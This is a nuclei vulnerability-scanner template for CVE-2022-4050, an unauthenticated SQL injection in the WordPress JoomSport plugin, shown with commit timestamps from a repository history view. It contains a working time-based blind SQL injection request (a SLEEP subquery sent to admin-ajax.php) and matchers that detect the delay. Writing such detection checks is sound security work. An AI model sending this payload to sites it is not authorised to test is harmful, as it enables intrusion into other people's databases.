nuclei-templates/http/cves/2022/CVE-2022-4050.yaml

46 lines
1.6 KiB
YAML
Raw Normal View History

2022-12-13 14:22:56 +00:00
id: CVE-2022-4050
info:
name: WordPress JoomSport <5.2.8 - SQL Injection
2022-12-13 14:22:56 +00:00
author: theamanrawat
severity: critical
description: |
WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2022-12-13 14:22:56 +00:00
reference:
- https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f
- https://wordpress.org/plugins/joomsport-sports-league-results-management/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4050
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-12-13 14:22:56 +00:00
cve-id: CVE-2022-4050
cwe-id: CWE-89
2023-07-15 16:29:17 +00:00
epss-score: 0.16485
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:*
2022-12-13 14:22:56 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: beardev
product: joomsport
tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth
2022-12-13 14:22:56 +00:00
http:
2022-12-13 14:22:56 +00:00
- raw:
- |
2022-12-16 02:08:03 +00:00
@timeout: 15s
2022-12-13 14:22:56 +00:00
POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-12-16 02:08:03 +00:00
mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"}
2022-12-13 14:22:56 +00:00
matchers:
- type: dsl
dsl:
2022-12-16 02:08:03 +00:00
- 'duration>=5'
2022-12-13 14:22:56 +00:00
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "jscaruselcont jsview2")'
2022-12-14 05:13:47 +00:00
condition: and